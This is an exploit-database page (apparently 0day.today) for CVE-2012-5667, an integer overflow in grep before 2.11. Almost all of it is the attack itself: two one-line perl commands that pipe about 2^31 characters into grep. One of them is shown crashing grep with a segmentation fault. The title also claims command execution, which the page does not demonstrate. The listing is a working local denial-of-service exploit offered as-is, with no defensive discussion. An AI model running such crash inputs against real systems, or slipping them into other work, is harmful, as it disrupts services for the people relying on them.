[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Grep <2.11 INT overflow, DoS, CMD Execution

Author
MegaManSec
Risk
[
Security Risk High
]
0day-ID
0day-ID-20085
Category
local exploits
Date add
30-12-2012
CVE
CVE-2012-5667
Platform
linux
#There are many ways of doing this.

#Method one:
$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
Segmentation fault (core dumped)


#Method two:
$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null


Twitter: https://twitter.com/MegaManSec

#  0day.today [2024-12-23]  #